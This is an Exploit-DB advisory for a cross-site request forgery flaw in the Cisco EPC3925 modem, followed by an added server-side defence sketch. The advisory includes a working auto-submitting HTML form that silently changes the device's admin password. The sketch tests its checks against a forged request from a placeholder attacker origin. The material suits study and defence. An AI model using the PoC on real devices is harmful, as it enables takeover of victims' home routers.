Cisco EPC3925 - Cross-Site Request Forgery

EDB-ID: 30362
Platform: Hardware
Date: 2013-12-16

#######################################################################
# Exploit Title: Cisco EPC3925 - Cross Site Request Forgery
# Google Dork: N/A
# Date: 12-11-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.cisco.com 
# Software Link: Not public
# Version: epc3925-E10-5-v302r125572-130520c
# Tested on: Cisco EPC3925 
# CVE: N/A
#######################################################################
# Description:
# 
# This proof of concept demonstrates that the admin password can be 
# changed by an attacker in a CSRF attack. However, it seems like any
# setting in the device can be manipulated using an attack like this.
#
#
# Side note: The device does not ask for the current password.
#            
#
# Location:
#
# POST http://[target]/goform/Quick_setup
#
# Parameters:
#
# Password=&PasswordReEnter=&save=Save+Settings
#
# PoC: 
#
# <html>
#
# <form name="reseller" method="POST" action="http://[target]/goform/Quick_setup" id="csrf_attack" target="csrf_iframe">
#   <input type="hidden" name="Password" value="attackers_password">
#   <input type="hidden" name="PasswordReEnter" value="attackers_password">
#   <input type="hidden" name="save" value="Save Settings">
# </form>
#
# <iframe id="csrf_iframe" style="visibility:hidden;display:none"></iframe>
#
# <script>
#  document.getElementById('csrf_attack').submit();
# </script>
# <center>The payload has been executed....</center>
#
# </html> 
#
# Check out the video at: http://www.nerdbox.it/cisco-epc3925-csrf-vulnerability/
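
Added example, not part of the original advisory and not Cisco firmware code: a sketch of the server-side checks whose absence the description points to (no origin validation, no anti-CSRF token, no current-password prompt), run against a request shaped like the PoC form's. The field names csrf_token and CurrentPassword, the session object, the host 192.168.0.1 and all sample values are assumptions constructed for illustration.

```javascript
// Added example: hypothetical server-side checks, not Cisco firmware code.
// Field names csrf_token and CurrentPassword are assumptions; Password and
// PasswordReEnter are the parameters listed in the advisory.

// Constant-time comparison so the token check does not leak by timing.
function safeEqual(a, b) {
  if (typeof a !== 'string' || typeof b !== 'string' || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Host of the Origin (fallback: Referer) header; null if missing or unparseable.
function sourceHost(headers) {
  const raw = headers.origin || headers.referer;
  if (!raw) return null;
  try { return new URL(raw).host; } catch (e) { return null; }
}

// req: { method, headers (lower-case names), body (parsed form fields) }
// session: { csrfToken, verifyPassword(pw) }; allowedHosts: the device's own host names.
function checkQuickSetup(req, session, allowedHosts) {
  if (req.method !== 'POST') return 'reject: method';
  const src = sourceHost(req.headers);
  if (src === null || !allowedHosts.includes(src)) return 'reject: cross-origin';
  if (!safeEqual(req.body.csrf_token, session.csrfToken)) return 'reject: csrf token';
  if (!session.verifyPassword(req.body.CurrentPassword)) return 'reject: current password';
  const { Password, PasswordReEnter } = req.body;
  if (!Password || Password !== PasswordReEnter) return 'reject: new password';
  return 'accept';
}

// Constructed sample data (not captured traffic); verifyPassword is a stand-in
// for a real hashed-password check.
const HOSTS = ['192.168.0.1'];
const SESSION = { csrfToken: 'k3Jq9sample-token', verifyPassword: (pw) => pw === 'current-admin-pw' };
const forged = { // shape of the request the PoC form produces
  method: 'POST',
  headers: { host: '192.168.0.1', origin: 'http://attacker.example' },
  body: { Password: 'attackers_password', PasswordReEnter: 'attackers_password', save: 'Save Settings' },
};
const legit = {
  method: 'POST',
  headers: { host: '192.168.0.1', origin: 'http://192.168.0.1' },
  body: { csrf_token: 'k3Jq9sample-token', CurrentPassword: 'current-admin-pw',
          Password: 'new-pw', PasswordReEnter: 'new-pw', save: 'Save Settings' },
};
console.log(checkQuickSetup(forged, SESSION, HOSTS));
console.log(checkQuickSetup(legit, SESSION, HOSTS));
```

Checking the source against an allow-list of the device's own host names, rather than against the request's Host header, also rejects requests that arrive under an unexpected host name.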